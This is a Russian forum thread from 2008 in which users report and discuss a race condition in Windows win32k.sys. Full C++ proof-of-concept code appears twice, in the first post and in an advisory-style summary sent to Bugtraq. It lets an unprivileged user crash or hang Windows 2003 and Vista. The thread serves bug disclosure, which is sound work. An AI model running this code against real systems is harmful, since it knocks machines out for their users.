Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | | |
может, в рассылку багтрака? :) 03.11.08 22:11 Число просмотров: 4308
Автор: Killer{R} <Dmitry> Статус: Elderman
|
|
<programming>
|
BSOD в win32k.sys 02.11.08 08:03
Автор: Killer{R} <Dmitry> Статус: Elderman
|
Предисловие: привет amirul ;)
Давече дописывал тут одну свою фриварную тулзу (HKM) и напоролся на бсод, вызываемый юзермодным кодом без админских прав. workaround от бсода я придумал, ибо негоже мелкой тулзе винду убивать, но сам бсод - есть баг микрософтовский. И вот относительно минимальный, исключительно юзермодный код, которым он воспроизводится:
Готовый проект для VC6 (с откомпиленными бинарями) можно скачать тут: http://slil.ru/26296017
Исходники, а то долго рассказывать что код делает:
hookproc.dll:
,
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
extern "C" __declspec(dllexport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam)
{
::Sleep(0);
return ::CallNextHookEx(0, nCode, wParam, lParam);
}
---,
launch.exe:
,
extern "C" __declspec(dllimport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam);
HANDLE g_stop_event = CreateEvent(NULL, TRUE, FALSE, NULL);
DWORD CALLBACK WinThreadProc(PVOID p)
{
TCHAR name[32];
if (p)
wsprintf(name, "desk_%x", p);
else
wsprintf(name, "default");
HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
::SetThreadDesktop(desk);
for(int i=0; i<8; i++)
{
CreateWindow(TEXT("STATIC"), TEXT("dummy"),
WS_VISIBLE, 10, i*30, 200, 30, 0, 0, 0, 0);
}
MSG msg;
while (1)
{
::GetMessage(&msg, NULL, 0, 0);
::TranslateMessage(&msg);
::DispatchMessage(&msg);
}
::SetThreadDesktop(old_desk);
::CloseDesktop(desk);
return 0;
}
DWORD CALLBACK ThreadProc(PVOID p)
{
TCHAR name[32];
if (p)
wsprintf(name, "desk_%x", p);
else
wsprintf(name, "default");
HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
::SwitchDesktop(desk);
::Sleep(0);
HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
::SetThreadDesktop(desk);
HINSTANCE dll = ::GetModuleHandle(TEXT("HOOKPROC.dll"));
HHOOK hk1 = ::SetWindowsHookEx(WH_MOUSE, DummyHookProc, dll, 0);
HHOOK hk2 = ::SetWindowsHookEx(WH_CALLWNDPROC, DummyHookProc, dll, 0);
HHOOK hk3 = ::SetWindowsHookEx(WH_CALLWNDPROCRET, DummyHookProc, dll, 0);
HHOOK hk4 = ::SetWindowsHookEx(WH_GETMESSAGE, DummyHookProc, dll, 0);
for (;;)
{
MSG msg;
while (::PeekMessage(&msg, NULL, 0, 0, PM_REMOVE))
{
::TranslateMessage(&msg);
::DispatchMessage(&msg);
}
if (::MsgWaitForMultipleObjects(1, &g_stop_event,
FALSE, INFINITE, QS_ALLINPUT) == WAIT_OBJECT_0)
{
break;
}
}
::SwitchDesktop(old_desk);
::Sleep(0);
::UnhookWindowsHookEx(hk1);
::UnhookWindowsHookEx(hk2);
::UnhookWindowsHookEx(hk3);
::UnhookWindowsHookEx(hk4);
::PostMessage(HWND_BROADCAST, WM_NULL, 0, 0);
::SendNotifyMessage(HWND_BROADCAST, WM_NULL, 0, 0);
::SetThreadDesktop(old_desk);
::CloseDesktop(desk);
return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
int i;
for(i=0; i<4; i++)
{
::CloseHandle(::CreateThread(NULL, 0, WinThreadProc, (LPVOID)i, 0, NULL));
}
::Sleep(1000);;
while((::GetAsyncKeyState(VK_ESCAPE)&32768)==0)
{
for(i=0; i<4; i++)
{
HANDLE trd = ::CreateThread(NULL, 0, ThreadProc, (LPVOID)i, 0, NULL);
::Sleep(500);
::SetEvent(g_stop_event);
::WaitForSingleObject(trd, INFINITE);
::ResetEvent(g_stop_event);
::CloseHandle(trd);
}
}
return 0;
}
---,
BSOD'ятся или жестко зависают в течении нескольких минут работы проги 2к3 на одноядерном атлоне, и Vista x86 на двухядерном интеле.
Стек бсода с висты:
ChildEBP RetAddr Args to Child
8f5ac728 81e835a0 0000008e c0000005 97915cd3 nt!KeBugCheckEx+0x1e
8f5acaf8 81ea563a 8f5acb14 00000000 8f5acb68 nt!KiDispatchException+0x1a9
8f5acb60 81ea55ee 8f5acc5c 97915cd3 badb0d00 nt!CommonDispatchException+0x4a (FPO: [0,20,0])
8f5acb80 81f02215 0000000b 948f53f0 00000000 nt!KiExceptionExit+0x186
8f5acc5c 97991dad 15e02058 00000000 00000000 nt!EtwTraceContextSwap+0x14a
8f5acc78 979d9b8b 00000000 00000000 00000000 win32k!xxxCallNextHookEx+0x35 (FPO: [Non-Fpo])
8f5acccc 979166ed fbe024f0 00000005 00000000 win32k!fnHkINLPCWPEXSTRUCT+0x5d (FPO: [Non-Fpo])
8f5acce8 9793d674 fbe024f0 00000005 00000000 win32k!NtUserfnDWORD+0x27 (FPO: [Non-Fpo])
8f5acd20 81ea4a7a 005d00bc 00000005 00000000 win32k!NtUserMessageCall+0xc6 (FPO: [Non-Fpo])
8f5acd20 77549a94 005d00bc 00000005 00000000 nt!KiFastCallEntry+0x12a (FPO: [0,3] TrapFrame @ 8f5acd44)
06ecea5c 76b48871 76b70b70 005d00bc 00000005 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
06ecea60 76b70b70 005d00bc 00000005 00000000 USER32!NtUserMessageCall+0xc (FPO: [Non-Fpo])*WARNING: Unable to verify checksum for hookproc.dll*ERROR: Symbol file could not be found. Defaulted to export symbols for hookproc.dll -
06ecea90 1000102f 00000000 00000000 00000000 USER32!CallNextHookEx+0x10b (FPO: [Non-Fpo])
WARNING: Stack unwind information not available. Following frames may be wrong.
06ecead8 76b929ff 00040000 00000000 06eceaf0 hookproc!DummyHookProc+0x1f
06eceb00 76b50a65 084124f0 00000005 00000000 USER32!fnHkINLPCWPSTRUCTA+0x4f (FPO: [Non-Fpo])
06eceb28 775499ce 06eceb40 00000018 06ecf208 USER32!__fnDWORD+0x24 (FPO: [Non-Fpo])
06eceb54 76b43cf7 76b43b94 00000088 06ecee80 ntdll!KiUserCallbackDispatcher+0x2e (FPO: [0,0,0])
06eceb58 76b43b94 00000088 06ecee80 06eceba8 USER32!NtUserCreateWindowEx+0xc (FPO: [Non-Fpo])
06ecedfc 76b43cc3 00000088 06ecee80 06ecee94 USER32!VerNtUserCreateWindowEx+0x1ac (FPO: [Non-Fpo])
06eceea8 76b43d9a 00000088 6ff5239c 06ecee94 USER32!_CreateWindowEx+0x1f9 (FPO: [Non-Fpo])
---
|
|
Вроде ответили, что форварднули куда надо. 04.11.08 09:33
Автор: amirul <Serge> Статус: The Elderman
|
Посмотрим как быстро пофиксят
|
| |
А ктото говорил что не было ошибок в вин32к ;) 04.11.08 11:18
Автор: Killer{R} <Dmitry> Статус: Elderman
|
А ктото говорил что не было ошибок в вин32к ;)
Просто надо хорошо поискать. Судя по спертым сырцам винды код win32k - еще те макароны.. А в них баги всегда есть)
|
| | |
Ну тогда мне выдали 2. Это третья 04.11.08 11:36
Автор: amirul <Serge> Статус: The Elderman
|
> А ктото говорил что не было ошибок в вин32к ;) Причем своими глазами я видел только 2.
> Просто надо хорошо поискать. Судя по спертым сырцам винды > код win32k - еще те макароны.. А в них баги всегда есть) Это да. Хотя наверное за всем этим есть какой то скрытый смысл - а если есть внутренняя логика, то неважно как оно выглядит внешне - ошибок будет мало. Хороший пример - автогенеренный код. Такой нечитабельной каши не напишет ни одна кодманки, а работает оно идеально :-)
|
| | | |
Проблема такого кода в том что его модифицировать опасно... 04.11.08 11:50
Автор: Killer{R} <Dmitry> Статус: Elderman Отредактировано 04.11.08 11:55 Количество правок: 2
|
> Это да. Хотя наверное за всем этим есть какой то скрытый > смысл - а если есть внутренняя логика, то неважно как оно > выглядит внешне - ошибок будет мало. Хороший пример - > автогенеренный код. Такой нечитабельной каши не напишет ни > одна кодманки, а работает оно идеально :-) Проблема такого кода в том что его модифицировать опасно. Особенно без полного набора тестов на функционал и безопасность. Одинаково опасно модифицировать и кашу кодманки и кодогенератора :)
Что похоже и имело место тут. Т.к. ХР не свалилась за ночь издевательства десктопами. А 2к3/Виста валятся в первые 10 секунд. Могу даже дальше пофантазировать и предположить что изменения в коде были вызваны введением UAC и необходимостью разграничения доступа к user32 объектам между различными IL. Впрочем непонятно почему 2к3 поломали по сравнению с ХР. Может, там уже в win32k сделали эти изменения - на будущее :)
|
| | | | |
Согласен 04.11.08 21:34
Автор: amirul <Serge> Статус: The Elderman
|
> Проблема такого кода в том что его модифицировать опасно. > Особенно без полного набора тестов на функционал и Тесты то есть. И кавередж тоже. Вот только рейсы не выявляются ни одним кодкавереджем.
> безопасность. Одинаково опасно модифицировать и кашу > кодманки и кодогенератора :) Ага :-)
В общем пошло обсуждение и вроде бы нашли related issue.
|
|
И тебе привет :-) 02.11.08 10:04
Автор: amirul <Serge> Статус: The Elderman
|
> Давече дописывал тут одну свою фриварную тулзу (HKM) и > напоролся на бсод, вызываемый юзермодным кодом без > админских прав. workaround от бсода я придумал, ибо негоже > мелкой тулзе винду убивать, но сам бсод - есть баг Негоже.
> микрософтовский. И вот относительно минимальный, > исключительно юзермодный код, которым он воспроизводится: Сейчас поздно. Завтра попробую потестить, а с понедельника опять таки попробую найти куда бы это протолкнуть.
|
| |
На работе проверил на ХР и Висте х64. ХР вроде не падает а... 03.11.08 15:25
Автор: Killer{R} <Dmitry> Статус: Elderman Отредактировано 03.11.08 15:27 Количество правок: 1
|
> > микрософтовский. И вот относительно минимальный, > > исключительно юзермодный код, которым он > воспроизводится: > Сейчас поздно. Завтра попробую потестить, а с понедельника > опять таки попробую найти куда бы это протолкнуть. На работе проверил на ХР и Висте х64. ХР вроде не падает, а виста 64битная - тоже грохнулась как и 32хбитная. Причем уменьшение Sleep(500) до Sleep(100) значительно ускоряет процесс :)
Похоже гдето гонка в win32k в снятии хуков.
Кстати обе висты проапдейтенные по самое не балуй.
|
| | |
Есть репродюс на висте и одной из последних сборок вин7 :-) 03.11.08 21:58
Автор: amirul <Serge> Статус: The Elderman
|
> На работе проверил на ХР и Висте х64. ХР вроде не падает, а > виста 64битная - тоже грохнулась как и 32хбитная. Причем > уменьшение Sleep(500) до Sleep(100) значительно ускоряет > процесс :) > Похоже гдето гонка в win32k в снятии хуков. > Кстати обе висты проапдейтенные по самое не балуй.
Буду искать куда бы это запихать (сам я баг открыть не могу - ибо совершенно в другой команде).
|
| | | |
может, в рассылку багтрака? :) 03.11.08 22:11
Автор: Killer{R} <Dmitry> Статус: Elderman
|
|
| | | | |
Можно и туда. По моему вполне себе новость. Но решение за dl-ем :-) 03.11.08 22:28
Автор: amirul <Serge> Статус: The Elderman
|
|
| | | | | |
легко, если это будет сформулировано словами :) 03.11.08 22:59
Автор: dl <Dmitry Leonov>
|
Т.е. источник проблемы - активное создание хуков из потоков в сочетании с созданием рабочих столов для каждого потока?
|
| | | | | | |
Примерно такими? :) 03.11.08 23:35
Автор: Killer{R} <Dmitry> Статус: Elderman Отредактировано 03.11.08 23:38 Количество правок: 2
|
Многократное переключение между Win32 объектами рабочих столов, на которых есть окна, с одновременным созданием потоков, устанавливающих/снимающих Win32 хуки на этих столах и рассылающих оконные сообщений на них в половине случаев приводит к BSODу изза AV в коде win32k.sys, а в другой половине - к зависанию системы. Происходит это предположительно изза race condition между потоком, снимающим хук и одновременной доставкой сообщения в другой поток. В этих условиях проблема воспроизводится под win'2k3, Vista x86 и x64. Для проведения атаки достаточно прав обычного пользователя.
Код:
hookproc.dll:
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
extern "C" __declspec(dllexport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam)
{
::Sleep(0);
return ::CallNextHookEx(0, nCode, wParam, lParam);
}
launch.exe:
// launch.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
extern "C" __declspec(dllimport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam);
HANDLE g_stop_event = CreateEvent(NULL, TRUE, FALSE, NULL);
DWORD CALLBACK WinThreadProc(PVOID p)
{
TCHAR name[32];
if (p)
wsprintf(name, "desk_%x", p);
else
wsprintf(name, "default");
HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
::SetThreadDesktop(desk);
for(int i=0; i<8; i++)
{
CreateWindow(TEXT("STATIC"), TEXT("dummy"),
WS_VISIBLE, 10, i*30, 200, 30, 0, 0, 0, 0);
}
MSG msg;
while (1)
{
::GetMessage(&msg, NULL, 0, 0);
::TranslateMessage(&msg);
::DispatchMessage(&msg);
}
::SetThreadDesktop(old_desk);
::CloseDesktop(desk);
return 0;
}
DWORD CALLBACK ThreadProc(PVOID p)
{
TCHAR name[32];
if (p)
wsprintf(name, "desk_%x", p);
else
wsprintf(name, "default");
HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
::SwitchDesktop(desk);
::Sleep(0);
HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
::SetThreadDesktop(desk);
HINSTANCE dll = ::GetModuleHandle(TEXT("HOOKPROC.dll"));
HHOOK hk1 = ::SetWindowsHookEx(WH_MOUSE, DummyHookProc, dll, 0);
HHOOK hk2 = ::SetWindowsHookEx(WH_CALLWNDPROC, DummyHookProc, dll, 0);
HHOOK hk3 = ::SetWindowsHookEx(WH_CALLWNDPROCRET, DummyHookProc, dll, 0);
HHOOK hk4 = ::SetWindowsHookEx(WH_GETMESSAGE, DummyHookProc, dll, 0);
for (;;)
{
MSG msg;
while (::PeekMessage(&msg, NULL, 0, 0, PM_REMOVE))
{
::TranslateMessage(&msg);
::DispatchMessage(&msg);
}
if (::MsgWaitForMultipleObjects(1, &g_stop_event,
FALSE, INFINITE, QS_ALLINPUT) == WAIT_OBJECT_0)
{
break;
}
}
::SwitchDesktop(old_desk);
::Sleep(0);
::UnhookWindowsHookEx(hk1);
::UnhookWindowsHookEx(hk2);
::UnhookWindowsHookEx(hk3);
::UnhookWindowsHookEx(hk4);
::PostMessage(HWND_BROADCAST, WM_NULL, 0, 0);
::SendNotifyMessage(HWND_BROADCAST, WM_NULL, 0, 0);
::SetThreadDesktop(old_desk);
::CloseDesktop(desk);
return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
int i;
for(i=0; i<4; i++)
{
::CloseHandle(::CreateThread(NULL, 0, WinThreadProc, (LPVOID)i, 0, NULL));
}
::Sleep(1000);;
while((::GetAsyncKeyState(VK_ESCAPE)&32768)==0)
{
for(i=0; i<4; i++)
{
HANDLE trd = ::CreateThread(NULL, 0, ThreadProc, (LPVOID)i, 0, NULL);
::Sleep(100);
::SetEvent(g_stop_event);
::WaitForSingleObject(trd, INFINITE);
::ResetEvent(g_stop_event);
::CloseHandle(trd);
}
}
return 0;
}
---
Готовый проект под VC6 и скомпилированные бинарники скачать можно тут: http://slil.ru/26299966
|
| | | | | | | |
вполне, спасибо; запостил 04.11.08 01:16
Автор: dl <Dmitry Leonov>
|
|
| | | | | | |
Предположительно изза race condition с потоком который... 03.11.08 23:08
Автор: Killer{R} <Dmitry> Статус: Elderman
|
Предположительно изза race condition с потоком который снимает хук и одновременной доставкой сообщения в другой поток. Похоже оно пытается вызвать только что убитый хук. Имеют ли прямое отношение десктопы к этому, или просто оно приводят к каким либо особенным условиям тайминга исполнения плохо синхронизированного кода - пока хз. В дампе ничего напрямую про десктопы не видно. Но без них воспроизвести пока не получилось.
|
|
|